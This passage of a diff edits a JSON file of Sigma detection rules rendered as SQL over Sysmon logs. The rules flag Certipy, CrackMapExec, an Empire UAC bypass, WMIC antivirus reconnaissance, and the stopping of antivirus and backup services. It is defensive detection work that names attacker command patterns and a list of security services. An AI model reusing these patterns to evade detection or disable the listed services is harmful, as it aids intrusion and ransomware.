'Certipy.exe' OR Description LIKE '%Certipy%' ESCAPE '\\') OR ((CommandLine LIKE '% auth %' ESCAPE '\\' OR CommandLine LIKE '% find %' ESCAPE '\\' OR CommandLine LIKE '% forge %' ESCAPE '\\' OR CommandLine LIKE '% relay %' ESCAPE '\\' OR CommandLine LIKE '% req %' ESCAPE '\\' OR CommandLine LIKE '% shadow %' ESCAPE '\\') AND (CommandLine LIKE '% -bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -ca-pfx %' ESCAPE '\\' OR CommandLine LIKE '% -dc-ip %' ESCAPE '\\' OR CommandLine LIKE '% -kirbi%' ESCAPE '\\' OR CommandLine LIKE '% -old-bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -pfx %' ESCAPE '\\' OR CommandLine LIKE '% -target%' ESCAPE '\\' OR CommandLine LIKE '% -username %' ESCAPE '\\' OR CommandLine LIKE '% -vulnerable%' ESCAPE '\\' OR CommandLine LIKE '%auth -pfx%' ESCAPE '\\' OR CommandLine LIKE '%shadow auto%' ESCAPE '\\' OR CommandLine LIKE '%shadow list%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_pua_cleanwipe.yml" + "filename": "proc_creation_win_hktl_certipy.yml" }, { - "title": "HackTool - Empire PowerShell UAC Bypass", - "id": "3268b746-88d8-4cd3-bffc-30077d02c787", - "status": "stable", - "description": "Detects some Empire PowerShell UAC bypass methods", - "author": "Ecco", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "status": "experimental", + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" + "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" }, { - "title": "Renamed CreateDump Utility Execution", - "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "title": "Use of UltraViewer Remote Access Software", + "id": "88656cec-6c3b-487c-82c0-f73ebb805503", "status": "experimental", - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Command lines that use the same flags" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\createdump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UltraViewer' OR Company = 'DucFabulous Co,ltd' OR OriginalFileName LIKE 'UltraViewer\\_Desktop.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_createdump.yml" + "filename": "proc_creation_win_remote_access_software_ultraviewer.yml" }, { - "title": "Conhost Parent Process Executions", - "id": "7dc2dedd-7603-461a-bc13-15803d132355", + "title": "Potential Download/Upload Activity Using Type Command", + "id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", "status": "experimental", - "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", - "author": "omkar72", + "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\conhost.exe' ESCAPE '\\' AND NOT ((Provider_Name = 'SystemTraceProvider-Process') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND Image LIKE '%\\\\git.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% show --textconv %' ESCAPE '\\' OR ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (ParentCommandLine LIKE '%C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4%' ESCAPE '\\' AND (CommandLine LIKE '% show --textconv %' ESCAPE '\\' OR CommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND (ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\' OR ParentCommandLine LIKE '%show --textconv%' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1''' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4''' ESCAPE '\\') AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > \\\\\\\\\\*' ESCAPE '\\') OR (CommandLine LIKE '%type \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_conhost_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_type.yml" }, { - "title": "Using SettingSyncHost.exe as LOLBin", - "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "title": "Suspicious Driver Install by pnputil.exe", + "id": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", "status": "test", - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "author": "Anton Kutepov, oscd.community", + "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", + "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1574.008" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ - "Unknown" + "Pnputil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/install%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/add-driver%' ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\') AND Image LIKE '%\\\\pnputil.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_settingsynchost.yml" + "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" }, { - "title": "Windows Defender Definition Files Removed", - "id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", - "author": "frack113", + "title": "Potential Product Class Reconnaissance Via Wmic.EXE", + "id": "e568650b-5dcd-4658-8f34-ded0b1e13992", + "status": "experimental", + "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", + "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1047", + "car.2016-03-002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR OriginalFileName = 'MpCmdRun.exe') AND (CommandLine LIKE '% -RemoveDefinitions%' ESCAPE '\\' AND CommandLine LIKE '% -All%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%AntiVirusProduct%' ESCAPE '\\' OR CommandLine LIKE '%FirewallProduct%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" + "filename": "proc_creation_win_wmic_recon_product_class.yml" }, { - "title": "Use of Scriptrunner.exe", - "id": "64760eef-87f7-4ed3-93fd-655668ea9420", - "status": "experimental", - "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION", + "id": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", + "status": "test", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1218" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use when App-v is deployed" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ScriptRunner.exe' ESCAPE '\\' OR OriginalFileName = 'ScriptRunner.exe') AND CommandLine LIKE '% -appvscript %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (CommandLine LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR CommandLine LIKE '%system.io.streamreader%' ESCAPE '\\' OR CommandLine LIKE '%readtoend(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_scriptrunner.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_compress.yml" }, { - "title": "Reg Add Suspicious Paths", - "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", + "title": "Suspicious Windows Service Tampering", + "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", "status": "experimental", - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" + "attack.t1489" ], "falsepositives": [ - "Rare legitimate add to registry via cli (to these locations)" + "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE '%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_susp_paths.yml" + "filename": "proc_creation_win_susp_service_tamper.yml" }, { - "title": "Service StartupType Change Via Sc.EXE", - "id": "85c312b7-f44d-4a51-a024-d671c40b49fc", - "status": "experimental", - "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Disabled IE Security Features", + "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "status": "test", + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "False positives may occur with troubleshooting scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '% config %' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND (CommandLine LIKE '%disabled%' ESCAPE '\\' OR CommandLine LIKE '%demand%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_disable_service.yml" + "filename": "proc_creation_win_powershell_disable_ie_features.yml" }, { - "title": "Suspicious Use of PsLogList", - "id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", + "title": "HackTool - CrackMapExec Execution", + "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "status": "test", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M 